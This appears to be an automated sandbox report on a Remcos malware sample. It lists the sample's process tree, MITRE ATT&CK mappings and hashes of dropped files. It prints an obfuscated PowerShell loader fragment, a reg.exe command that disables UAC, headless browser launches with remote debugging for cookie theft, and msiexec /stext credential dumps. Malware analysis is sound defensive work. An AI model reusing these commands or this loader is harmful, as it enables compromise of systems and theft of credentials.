;$Spartelmassers=$Missificate[$Lustfulness]}$Deports=297429;$Lingonberry=31128;Neurological (Autobiografierne 'Anli$Aph G alilAgr.OVal,b AgpAGr nLStea:Rev,FKla LFritiensvkBeliK Rege Kenn Urosme,g Af,r= Byz OpryG ConE tatT Jou-EtabC.etaO FadNAfmat jereNutgN usktcitr L v$HaarrFldeAPicnC GirEnarkmHurkoReses,lseE U s ');Neurological (Autobiografierne 'Cyk $ nifgHipplRounoO.erbV lbaV.tfl Che:UdspSUnfitStili emakB ankD eseUndelRingsDunkbRaerrSignd ZonrChorbProdeTapirAllunSerfeSout Fdre=umen Sk,s[El tSskopyToldsS dvtNgleeBrigmA ti.Etw CndhjoParanFar,vGruneNonsrAk stSpis]Ci a:Dri.:handFProlr Fr.oFilmm uaBPrpaaSkras SyseCa,a6 D.e4Un,oSSkattPlatrWhydiTilsn FlogSp,i(appr$ traFTyndlRetriS nhkProfk flae,uffn indsC ki)U ig ');Neurological (Autobiografierne 'Lavo$Fl,egboddLVaniOHygrbDiagA .ogLSubr:MadrHTilhVCrp IA prDArt.mI.trAInt lUd aEQuarD AfgEstakSList .ea=,sth Kreu[KorpSSkytYdisusUddaTProleBiplM Tmm.HkerTVinteShotxZy nT,yrl. kuleTe tN,awnC incORappDIkenIMossnVacug ty] Res: Tin:PersAUrh.SVrdiCOveriBoksi Ren. Re gSkaleadreT LitsCodetDisprMissI onNv.neGFgte( tif$RentSShacT aceiCre kIncaK HavEFattLDu tS rthBSublrDip DFasaR Julbtel e.verr ,ianSn rETh.s)B,pr ');Neurological (Autobiografierne 'Kkk.$Ri eg ifiLPrveOFo.nBU.soa oedLBesu:FiloF SkoOInsuNTiltD ioSImprBFragEInteSKlastDoggY ndiRPa lEUdvul KofsCorpEBlacRTilssVekt=Retw$FrdehSukkvTaddiPremDSnusMNarka Favl RumEInduDA fleLavtS Hit.Pro SFaciUbasebSnevsAntit,ondRbilpIMellnmedfGDra ( Kap$latrD KapEPappPA,erO badrT gitUd,vsDiso, Goo$ PellEloxiStr,n kgGGrayo C,uNElevBDekaeZebrRFeusRRichysans)Ska ');Neurological $Fondsbestyrelsers;"
1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4508
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:876
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1860
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc05c0cc40,0x7ffc05c0cc4c,0x7ffc05c0cc58
      4⤵
      PID:4452
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,12467996190613875698,7669605681950331810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2
      4⤵
      PID:3808
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,12467996190613875698,7669605681950331810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:3
      4⤵
      PID:5004
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,12467996190613875698,7669605681950331810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2240 /prefetch:8
      4⤵
      PID:1008
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,12467996190613875698,7669605681950331810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1060
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,12467996190613875698,7669605681950331810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3336 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3076
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4608,i,12467996190613875698,7669605681950331810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4624 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4864
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,12467996190613875698,7669605681950331810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8
      4⤵
      PID:4368
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,12467996190613875698,7669605681950331810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4760 /prefetch:8
      4⤵
      PID:840
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lfnqmr"
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lfnqmr"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3148
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\nzsinckgu"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:4796
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xbfbnuvaidnvh"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4700
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc05dd46f8,0x7ffc05dd4708,0x7ffc05dd4718
      4⤵
      PID:2284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,11732000499510962832,14694360983066187134,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
      4⤵
      PID:968
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,11732000499510962832,14694360983066187134,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
      4⤵
      PID:4796
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,11732000499510962832,14694360983066187134,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
      4⤵
      PID:3576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2060,11732000499510962832,14694360983066187134,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1820
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2060,11732000499510962832,14694360983066187134,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4316
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2060,11732000499510962832,14694360983066187134,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3380
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2060,11732000499510962832,14694360983066187134,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2208

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4744

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4940

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Network Service Discovery

T1046

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
46be36cf180781dab3f2e3f1fce52259

SHA1
1f53a2ae07d7a900a81d945b59075c3ef9bfacbc

SHA256
e381dd6467637da62e3c8e299b5ccec421925616a825995ed09b667dc0dbce00

SHA512
21b9acf8010dd93cabd20e9804f5ae7356186353cdddbcf70a25f78169b87a90c99e3a8a1be0b5d5c8e8268e45381c0623b66ec842b683db9aa2d4308df15e36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
2796f1bb4c1400db3469bd28fffaf40d

SHA1
5b5a8e28772df54317a40232ce5e5e4084a3122b

SHA256
fe2a79658646b8aff1510e6d9021b286188962cd60f20b5c0f3a73899e663a23

SHA512
cd72a9d17159e5c127b623d95d31fb33bc56193315de7409bc108445ed92be530668f61ba9f72ca8a72b0bc14c2f025f3b1da039b60195365ec0dd9a96c841b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
88182157fcc37b7c2507a9e9381b88eb

SHA1
2786725f063b1724eacd0963efa5466ee035e5d0

SHA256
482b55be31da869f6b8afc84944f068b8ddfe42ce8b00b540d76d86e145c5752

SHA512
4d78973ed217982e9a9b83a61791901c312cdc624b9bf1b5736ddde78354f940dd78ead8ec8911039d5c0815304f20baf0abf1bf50bf7c3297d8b95e6fdb2a10

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
50d4a2a04d3055a7f13afbfe18a2e683

SHA1
e57878a27d2e9853b7bca5d458fdfc76b8b06377

SHA256
0ea6a7631dfad966edde3ecade426446b54cbd1acf3df807716ba9b1ef60455d

SHA512
5d1957208d2b51226f3e0ae3ecadcfbde63574a67df4969057b07a0fd50153a67a94f2ed531cb0c404967621da05b718265f188316031d7af5bc21e83149dd2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
91fc19ba3c5334ff8bf2574be7f1157c

SHA1
933be990f8bf216b5a727b91f9e37777341fca35

SHA256
68007cc30d3063bb0014aca1be96e52ee4d5ac604c7e81abc7357c0b54c4cfe8

SHA512
c604938764ff916b9de7ae81a7b2ab2b225aa9783dcf8e8bdde6627670a974c922c1032bcbb095866a26ac27c572b43cd1a3b941b707aee3fcbe86724826d417

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
ff1befadfe8d3e1ba1c945c33c002a5b

SHA1
9fc41ff821ebdc85306251cd5cfda4138f92797c

SHA256
a70c40dd063adffb2bf1ddd07dbf60bcc49c81b8eb53c324e90daaf7738a2756

SHA512
d4f16462b2d9dabc722a39947671e2b4f3c8387527ea300f4d8e91fceae67782c2533c1603da2023b99d023106cfbbd02ea503d0049a59f9ab066471b4ce1576

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

Filesize
20KB

MD5
b40e1be3d7543b6678720c3aeaf3dec3

SHA1
7758593d371b07423ba7cb84f99ebe3416624f56

SHA256
2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

SHA512
fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Filesize
256KB

MD5
285264f2a949ba83b67c3dd206a9c3a5

SHA1
69e18f4a126c2c3788d36f98ce36116396ab2327

SHA256
a178f71af6b25e9dea4dcd7e15ed7517557e4bbc254acbdbd984f3b8fa57f67f

SHA512
c42b83cb8e3ed6167741ef1cd93c3f74af7653e92c53034576dc22acee4003be0b105132044a9811008f2294b298999f92ae9431f13947bb769ac47962cb4aeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

Filesize
192KB

MD5
b6ba05bececb79216b349f574d355ac8

SHA1
29e4957cea326434404b1d0768a36013fd4a4089

SHA256
bacb01da141ba7bc03a9fdb013d54c2c12155e8719139a9747930c930ac42dad

SHA512
a5532b8e7e3cc9ff63dea71b4ff81c9bbab27a9f426f6cb471210f6df9eb48640910713aeda557272cbe310c2db4ff6fe7c01ee6e24331598e5121771c9872c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History-journal

Filesize
8KB

MD5
597a90b0cd94acd276d83c485802a520

SHA1
f03f50416ae4079fb824cc46183736ebae9b0061

SHA256
45ac42fe5907fe24ec5d259b188416c5b564224acae7a4030082b81c2d0cd1e5

SHA512
b1819aa3a34026ca5be0dd17cae870612bf4f651bc694ded28d0c6f20c15ee89583d014a25b14b7d09c5e578f2ad9eb0aa7a1f9837d046a12c45c84766ed44a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Filesize
277B

MD5
daf4307fbba0ce75d13b607d7d90711d

SHA1
0e637ee8a7664c9c6ea449062c6af2ea7d9aad04

SHA256
b456e51db26a7a1b52af4dd7d4ca133b5221f988c12b7b0ce43cd4bde7fa3ced

SHA512
df0dd0477959f959f6be1a9e15fbc6dc7994dbfc47614702964f4539def6f94c56a08ae617e582035b6936aed094969b4c05a85e47c0746b85af2b6148af8888

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

Filesize
1KB

MD5
eed7241d44fd045ff3de25db4a407d94

SHA1
af1ce9a9210635c6ca4088702565c75458e8f912

SHA256
23e8c43822d86c343fd570cf9c7dc70e3a8d864fbd06dc59c4948f932afe0c9b

SHA512
c0c4d48de183c75848d8451c6741bb03c0a8ea26098a32e849db0a19dc9657081e327bc9a1997323478e382d498a2ad6c23cd84bbd12c4a6e520a80e1f72b012

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Filesize
20KB

MD5
ee0dceb6563955a17a1152c684a9c989

SHA1
7717128dfe984985b27b99bbb77d1571f9cd7485

SHA256
05843af293745c47ddc1b09f485c537694d0ebb0b29c7c99e492a5f11bc956fc

SHA512
9f3bf3bc10cc875a8deaecc4cd32f41a46606c1404ddb7696d8b71dffe8aaa0750ad9370386c4207a134232fc785b61cc61273063e2a97f3fcd607743eb36ab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
1KB

MD5
b2347e6653f3ab6da1255a848f85a025

SHA1
7688b4ecc62a62f746a2ef28052203b73f05d16a

SHA256
1357ff2c71dd75bae01d301998d7519acbaccb18fb05981853a00ed8b17ec68d

SHA512
86ac0a47d3736ef7ab90004b2e0269a383c2532b39adf02094445f9b9893edc9ec48d6a07107d16b0ee7decb1b02abee6dd94f79811799cd7095cb3d8a87c418

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
5KB

MD5
fe67ab135dbe23f3470f37b861b5cf70

SHA1
87edcc40984355a85b1d5944bcbd11cf0629e809

SHA256
a7ab897fcf041ee4f8b1ed572498f5a671e8ac75e3385a464705a69095daa30e

SHA512
a49117e15f951141119500b124455e32008df765d5e69a9ae499fdfba31e4b3a2fcb878bf483e0e117a27d894e23e22b3cbb7073580c6603cbeeddd4ae5e48fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
15KB

MD5
f21497c43aaeac34b774b5de599f0d7d

SHA1
958fd379a5ad6b9d142f8804cfa8bbb63ae8454f

SHA256
2774b0104751b5703109002ea568d0b0385a8e9566d0f4d7d704ebe82792bd7a

SHA512
364a81d4662c5a21c809ca8763a238d68c4834f09fd317fa51f589d471de056be5d84c449902220263bbc211567492ac99c6f67f6fc58d48425252861099cb68

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
24KB

MD5
5c6672444389f41d039f5f41b96544e5

SHA1
34e69a7092611959dd0b18d5c6d1ec9cd80c3388

SHA256
4eb52caa6eaf83f793d13b9835ea56785a90ed85330d5d48a573b4d8b9ebc5c2

SHA512
1178ca689d6f169b8c62ca5b770fcdfc1a8a693d7fa195a5e6824c0686477158f6c62e198cb8af3fc64550c6d31449011cc8533fd1f16107a173b7b356bbb7aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

Filesize
241B

MD5
9082ba76dad3cf4f527b8bb631ef4bb2

SHA1
4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

SHA256
bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

SHA512
621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

Filesize
279B

MD5
f35c6d0f3f759efa6307c03b42a652e3

SHA1
167a8e05e1347d64ba4b5b433b4663a1c354f071

SHA256
6b42026ed971ea1edbfd9721f171db363984de45c65f547d4daedbbc9966ba9b

SHA512
43b76a01f888e12f733bbe723435a77ef4c2cdc4c176dd9643e6b15ad2967ea335daecc27bcef6cd24ebf590a88d0321c8e0682122bb2a061319267c872399dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

Filesize
80B

MD5
69449520fd9c139c534e2970342c6bd8

SHA1
230fe369a09def748f8cc23ad70fd19ed8d1b885

SHA256
3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

SHA512
ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Filesize
265B

MD5
4b366239b795eea8fc593df5b91aed19

SHA1
809552b7eeec02b86db2eedb12120c4ab1eee60a

SHA256
3b52d70f2a69a1cd2fff96778345b899e39aec826276729be54ef08443cebf3c

SHA512
ef7e05331dfbdb61407c2efd2a2af568cf8a26209ace46a5e0e6a0d55cf0f04056f4d3ee233cb2c9acf2534172b05c87ed964b238803b8049e49a7a02cc98616

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

Download Submit
